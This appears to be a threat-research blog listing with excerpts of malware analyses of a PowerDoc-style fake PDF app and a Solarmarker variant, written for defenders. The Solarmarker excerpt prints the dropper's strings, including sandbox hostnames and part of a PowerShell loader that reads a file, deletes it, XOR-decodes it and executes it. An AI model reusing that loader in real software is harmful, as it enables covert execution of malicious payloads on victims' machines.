Posts

Showing posts with the label YARA

Supremepdfapp: Malware that's not so supreme

Image
Technical analysis of SupremePDFApp PowerDoc malware: Chrome profile targeting, XOR config decoding, Web Data manipulation, and C2 emulation technique In another YAPA investigation, I began by "hunting" around keywords using Google's ad transparency, and came across supremepdfapp[.]com . I went the website and downloaded the sample, now found on VirusTotal . As pointed out to me by MalasadaTech , this advertiser is based in Hong Kong, while the "company signer" is an Israel based company that is only a few days old at the time of this writing. While pivoting around on various strings, and the icon hash, I noticed that other related samples actually flagged under my powerdocapp hardcoded XOR key YARA rule . Some examples of previous variants under the old YARA rule include: PowerDoc.exe  and NotAWord.ex e. This time however, the hard-coded XOR key has been changed (this change is now reflected in my YARA rule).  Observed Obfuscated Strings string text = ...

Solarmarker: Analysis of the October 2023 variant

Image
Squiblydoo came across a new variant of solarmarker malware and posted the finidings here: https://twitter.com/SquiblydooBlog/status/1717464614403735562 Unfortunately this new version no longer works with my extractor tool found here: https://github.com/securitymagic/tools/blob/main/extractsmdll.py However, RussianPanda posted a new tool which can be used after the Inno Package is extracted. A quick analysis suggests that the new dropper uses Inno Setup, some quick tools can pull some of the data, including a few of the powershell commands seen below. innounp -x -m .\Appendix-C-Acceptance-of-Acknowledgement-of-Policies-and.exe strings .\CompiledCode.bin WIN-VUA6POUV5UP 0CC47AC83803 JOHN-PC FkLmng TNewEdit Cancel {tmp} .pdf {tmp}\budget_fy2024.pdf \..\ \budget_fy2024.pdf open {tmp}\data.dat pSDubTWyjzdAhmBNLtROxasMKfJUPQVv iex([Text.Encoding]::UTF8.GetString((({$F=[IO.File]::ReadAllBytes($args[0]);(rm $args[0]);return $F}.invoke(' '))|%{$_ -bxor ...